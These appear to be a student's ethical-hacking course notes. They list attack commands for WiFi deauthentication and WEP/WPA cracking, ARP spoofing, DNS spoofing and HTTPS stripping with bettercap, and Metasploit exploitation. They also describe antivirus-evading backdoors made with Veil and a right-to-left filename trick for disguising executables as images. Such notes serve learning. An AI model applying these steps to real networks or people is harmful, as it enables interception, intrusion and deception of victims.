Page 1 of 9

Five Stages of Hacking

1. Reconnaissance (Scanning)
   • Passive vs Active
2. Scanning and Enumeration
   • Tools: Nmap, Nessus, Nikto
3. Gaining Access
4. Maintaining Access
5. Covering Tracks

---

Passive Recon

Location Information:

• Physical location:
  • Satellite Images
  • Open recon
  • Building layout

Job Information:

• Employees
• Pictures

Target Validation:

• WHOIS
• nslookup
• dnsrecon

Finding Subdomains:

• Google Fu
• dig
• Nmap

Fingerprinting:

• Tools:
  • Nmap
  • Netcat
  • WhatWeb

Data Breach:

• Tool: HaveIBeenPwned

---

Page 2 of 9

Network Penetration

WiFi Adapter Usage:

WiFi adapters can be used to monitor and perform packet injection.

• Commands:

  airmon-ng start wlan0 (interface)  # Enables monitor mode
  ifconfig [start | stop] wlan0      # Start or stop wlan0
  iwconfig                           # Check mode of wlan0

  • wlan0: mode → managed/monitor

Network Information Dump:

• Command:

  airodump-ng <interface>  # Dumps network information

  • Encryption: WPA2
  • BSSID, PLR, Beacons, Data, etc.
  • Proximity
  • ESSID → Name of AP

Network Attack Commands:

• Packet Dump:

  airodump-ng --channel <ch-num> --bssid <id> --write <filename>

• Network Attack:

  aireplay-ng --deauth <packets> -a <MAC address>

---

Page 3 of 9

WiFi Network Attacks

WEP Cracking:

1. Capture packets used by clients connected to AP.
   • Command:

     airodump-ng <cap-file>

     This is traffic analysis.

2. If no traffic is available:
   • Perform packet injection.
     • Fake Authentication:

       aireplay-ng --fakeauth -a <router-endpoint> -h <client-mac> <interface>

     • ARP Replay:

       aireplay-ng --arpreplay -b <router-endpoint>

WPA Cracking:

• WEP is weak encryption with a key setup (IV + key/password).
• WPA/WPA2 is stronger encryption.
• Attack via handshake:
  • Command:

    aireplay-ng --deauth 5 -a <router-mac> <interface>

• Capture handshake traffic.

---

Page 4 of 9

Handshake Capture:

• Command:

  airodump-ng -w <wordlist> <cap-file>

---

Network Discovery

Using netdiscover:

• Tool:

  netdiscover -r 10.0.0.0/24  # Discover IP, MAC, Name

Using nmap:

• Tool:

  nmap 10.0.0.0/24  # Shows IP, Ports, MAC, Names

---

Attack 2: MITM (Man-in-the-Middle)

ARP Poisoning:

1. ARP protocol asks for who has IP.
2. Fake (Hardware) sends a positive response saying "I have that IP".

---

ARP Poisoning Flowchart:

sequenceDiagram
    participant Router
    participant Machine1
    participant Machine2
    Router->>Machine1: Request IP Response
    Machine1->>Router: Positive Response ("I have that IP")
    Router->>Machine2: Request IP Response
    Machine2->>Router: Positive Response ("I have that IP")

---

Page 5 of 9

How to do this attack?

i) Terminal:

arpspoof -i eth0 -t <victim-ip> <host-ip>
# <interface>   router-ip   machine-ip

ii) Terminal:

arpspoof -i eth0 -t <machine-ip> <router-ip>

iii) Change MAC address (Good to have, I don't think we can do this)

• Note: This might not be feasible.

iv) IP Forwarding:

sysctl net.ipv4.ip_forward=1
# OR
echo 1 > /proc/sys/net/ipv4/ip_forward

DONE ✅

We can also use frameworks:

• i) Bettercap
• ii) Ettercap

With these, we will be able to log requests and strip HTTPS headers.

---

Page 6 of 9

HSTS Protocol:

• HSTS protocol doesn’t allow stripping HTTPS headers.

---

b) DNS

DNS Spoofing:

• It is possible that users have not configured their router to be the DNS server.
• In that case, DNS spoofing might not work.
• Otherwise, the frameworks can be used to spoof DNS as well.

Steps:

1. Host a web server.
2. Configure DNS spoof to redirect to a website.

Example:

bettercap -iface <interface>
# <modules> on
# help

Common Modules in DNS Spoofing:

• arp.spoof → ARP spoofing
• net.probe → Network scanning
• dns.spoof → DNS spoofing
• wifi → Handshake capturing, WiFi recon, WiFi deauth
• net.sniff → To sniff WiFi packets
• http.proxy → SSL hijacking, proxy request response

Note:

• MITM requires us to use the same network as the target.
• To avoid ARP poisoning, implement:
  • Static ARP mapping
  • Switch security (ARP inspection)
  • Network isolation

---

Page 7 of 9

c) HSTS Hijacks

Example:

• Scripts in Bettercap:
  • Use scripts that work with Bettercap (e.g., HSTS Hijack for stripping HTTPS headers).
  • Scripts location:

    /usr/local/share/bettercap/caplets

---

d) JavaScript Execution

Steps:

• Pass as payload in Bettercap.
• This works because the "hacker" communicates to the client and the original server.

---

III. System Penetration

a) System Vulnerability Scan

• Scan the system using nmap/zenmap.
• Nessus is another tool to discover networks but paid.
• Identify services running on the system.
• Use metasploit to exploit vulnerable versions of the services.

Example Commands:

msfconsole
use <module>
show options / show <option-name>
set <option-name> <value>
exploit

---

Page 8 of 9

B. Using "Veil"

Goal:

• Create backdoors to generate Metasploit payloads that bypass antivirus solutions.

Steps:

1. Evasion:
   • Generate an undetectable backdoor.
2. Obfuscation:
   • Obfuscate and generate the payload used for evasion.

Procedure:

• i) Select the type of payload & generate using evasion:
  • Language
  • Type: Meterpreter, etc.
  • Method: HTTP
• ii) Run the backdoor machine to listen for connections.
• iii) Run the payload in the target machine.
  • If meterpreter is used with Metasploit:
    • Gain control.
• iv) If we set processors to sleep, it may be able to bypass antivirus.

---

How to make the backdoor undetectable?

• Tools:
  • MSFVenom
  • FatRat (Remote Access Tool)
  • Unicorn
  • Empire Background

---

Page 9 of 9

Social Engineering

Overview

We still need to send over our exploits.

C. Social Engineering

Now, before jumping on it, assume a solution Maltego:

• Helps in analyzing different transformers like Website Crawler or Crypto to get reports on the targets.

With this tool, a user's social circle can be generated and presented in GUI.

Trick users into double-clicking .exe somehow:

• Use Right-to-Left characters for renaming files and make it look like .jpg.

---

Techniques

1. Phishing Mail:
   • Execute binaries on the system.
2. Social Media Attacks:
   • Exploiting user information and interactions.
3. JavaScript Codes on User Browser:
   • Example: BeEF (Browser Exploitation Framework)
     • Enables Web Tool usage for targeting vulnerabilities.

---

References:

• Tools: Nmap, Nessus, Nikto, netdiscover, airodump-ng, aireplay-ng.
• Related Topics: Network Security, Encryption Standards, Ethical Hacking, MITM Attacks.